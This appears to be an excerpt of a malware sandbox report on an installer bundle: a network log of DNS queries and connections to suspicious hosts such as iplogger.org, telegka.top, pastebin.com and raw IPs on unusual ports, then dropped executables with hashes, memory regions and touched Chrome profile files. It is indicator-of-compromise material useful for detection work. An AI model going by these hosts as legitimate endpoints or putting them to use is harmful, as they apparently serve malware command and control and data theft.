US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 propanla.com udp
NL 194.104.136.5:46013 tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.16.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
N/A 127.0.0.1:54599 tcp
N/A 127.0.0.1:54603 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.179.234:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.179.234:443 ogads-pa.googleapis.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 telegka.top udp
FR 51.178.186.149:80 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 1.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 telegin.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 telegin.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegin.top udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe

MD5 c10ba859e90df8a8d8e7dcc8dfe5ac20
SHA1 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5
SHA256 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023
SHA512 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4712-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4712-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4712-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1764-91-0x0000000002430000-0x0000000002466000-memory.dmp

memory/2452-92-0x00000000734C0000-0x0000000073C70000-memory.dmp

memory/1764-93-0x0000000004EF0000-0x0000000005518000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

memory/2600-99-0x0000000000D20000-0x0000000000D38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcwwkdu1.p22.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3180-136-0x0000000004880000-0x000000000489E000-memory.dmp

memory/1032-135-0x0000000000040000-0x00000000000B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

memory/2452-137-0x0000000005660000-0x00000000059B4000-memory.dmp

memory/1560-112-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

memory/3180-108-0x0000000004900000-0x0000000004976000-memory.dmp

memory/2452-103-0x0000000004F40000-0x0000000004FA6000-memory.dmp

memory/2452-101-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/3792-124-0x00000000002B0000-0x00000000002B8000-memory.dmp

memory/2452-97-0x0000000004E30000-0x0000000004E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe

MD5 8b6f3a6e8d9797093a78f0b85da4a1fc
SHA1 2f8346a3ec3427c5a7681d166501f8f42f620b3b
SHA256 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8
SHA512 c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef

memory/3180-107-0x0000000000160000-0x00000000001D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2600-144-0x0000000001560000-0x0000000001566000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PHIHL.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/3180-157-0x0000000005150000-0x00000000056F4000-memory.dmp

memory/1900-156-0x0000000000860000-0x00000000008D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1764-75-0x00000000734CE000-0x00000000734CF000-memory.dmp

memory/4712-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4712-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4712-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4712-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4712-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4712-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4712-64-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4712-63-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4712-62-0x0000000000EF0000-0x0000000000F7F000-memory.dmp

memory/4712-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/4712-59-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4712-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2232-162-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2268-165-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1560-167-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1764-171-0x0000000005E00000-0x0000000005E4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-7CCLN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19d1fc7d2654d7a.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/2996-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1764-169-0x0000000005D60000-0x0000000005D7E000-memory.dmp

memory/2996-192-0x0000000005130000-0x000000000516C000-memory.dmp

memory/4712-201-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4712-203-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4712-202-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4712-198-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4712-194-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4712-200-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2104-208-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2996-191-0x0000000005200000-0x000000000530A000-memory.dmp

memory/2996-187-0x0000000004F90000-0x0000000004FA2000-memory.dmp

memory/2996-186-0x0000000005500000-0x0000000005B18000-memory.dmp

memory/4504-190-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1764-223-0x0000000006D00000-0x0000000006D1E000-memory.dmp

memory/1764-212-0x000000006C870000-0x000000006C8BC000-memory.dmp

memory/1764-224-0x0000000006D30000-0x0000000006DD3000-memory.dmp

memory/1764-210-0x0000000006CC0000-0x0000000006CF2000-memory.dmp

memory/2452-226-0x000000006C870000-0x000000006C8BC000-memory.dmp

memory/1764-236-0x00000000076C0000-0x0000000007D3A000-memory.dmp

memory/1764-237-0x0000000007080000-0x000000000709A000-memory.dmp

memory/1764-238-0x0000000007100000-0x000000000710A000-memory.dmp

memory/1764-240-0x00000000072F0000-0x0000000007386000-memory.dmp

memory/4088-239-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/1764-241-0x0000000007280000-0x0000000007291000-memory.dmp

memory/2452-243-0x00000000734C0000-0x0000000073C70000-memory.dmp

memory/1764-242-0x00000000734CE000-0x00000000734CF000-memory.dmp

memory/2452-244-0x0000000007150000-0x000000000715E000-memory.dmp

memory/1764-255-0x00000000072C0000-0x00000000072D4000-memory.dmp

memory/1764-256-0x00000000073B0000-0x00000000073CA000-memory.dmp

memory/1764-257-0x00000000073A0000-0x00000000073A8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 737957f82423638932969119b193b62e
SHA1 d4175a6d4e0de1b5d8a0e86eeac912dd040f66df
SHA256 6a7cc33e32c35b26cad3829ec311dc6dfaaef431454f7bbb6019f18ba81c6510
SHA512 c58c3705d735e3d60b5e3b85e4908db69d2255d6b33a039ed912eefc018c2abf253752cb630b836715a58b8f2d4954b26e3a1ea0666f145c49d4f6fdb367dfdf

memory/2452-263-0x00000000734C0000-0x0000000073C70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rqC~~.A

MD5 32ec5a7f8e578bbb6142b3c7972b5e3e
SHA1 dc335867f93b0e9e2f1d20ce520bb143789d733c
SHA256 7d828c11e69048323472ea71f6fd00bc26d6453ecb5f8972cf584d42a5748ec7
SHA512 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff

C:\Users\Admin\AppData\Local\Temp\F3U_R.J

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\TfSay.w

MD5 8649bd267357309e3ceaf325ef72ee1e
SHA1 7ea28d42e186163a536cdd276aafac6bf1ec9a2e
SHA256 98b9eb7f7bdab1e321d89320bbf37c6dd2f27a133c6886931a05dde265fbdfe1
SHA512 4bf603a2a08e241041910b6e812f3786f8ee5abeb4932f06aee7cf67ad39dba02937bb4b34a8d886ac6c98d419445ed06dd6c0df4dd6393f5ec0c70a30d3747b

C:\Users\Admin\AppData\Local\Temp\aobbVRP.2Y

MD5 adadb251d9dea14b1e40088e413cac09
SHA1 463c21b87129219dd19527988bb32187d2d9fe63
SHA256 1241b5729731da59ddac03300feccd6b36d4c8980e8d0f8557149e62cce94c82
SHA512 d1a2d59a93388cff4d867fcbdcabf141bdf311d9b4214731def39b379efb1711d496742771685ad617ff0f438c7591d1a815cbae4d55ea8be986a34944764f80

C:\Users\Admin\AppData\Local\Temp\y5ULsw.L6

MD5 e52e44f4497cd6774193799b4e11da75
SHA1 311b0e241233b161a9ce32eaac884dfa3c89e1ee
SHA256 59240a41f7dfabcb70c4bbf7bf3281f35a597fd40ce5069543e656244331d3bf
SHA512 096c5b765ba029bf752c3ca9afda7b93cc318baea3a00980e2d40379c1aaa13ea87fe2bfc91e52d2f40c1c960162cbd8b8b9a845960341ed63195035563c0a6e

memory/2748-277-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/1572-278-0x0000000000400000-0x0000000002F22000-memory.dmp

memory/4564-279-0x0000000002E60000-0x0000000002F05000-memory.dmp

memory/4564-280-0x0000000002F10000-0x0000000002FA2000-memory.dmp

memory/4564-283-0x0000000002F10000-0x0000000002FA2000-memory.dmp

memory/2232-293-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4780-294-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4564-317-0x0000000000400000-0x00000000005F0000-memory.dmp

memory/1572-316-0x0000000000400000-0x0000000002F22000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 27c4f20d38a83568b9e13a2574fccc0c
SHA1 029b28e99d6376f10831ed8cc0f1abf290cf347e
SHA256 caf821189772f88137d636ece6fafeb7749ad6a54ed71a21279716673d8bba72
SHA512 fbdfa543ed88252d1c0d8e4584297e0a2ef5991d881a5b361de9058fc6021c569afc0ee6857753a70e4e069f054afb4288fdbdf2169e363669dc361d1187f939

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

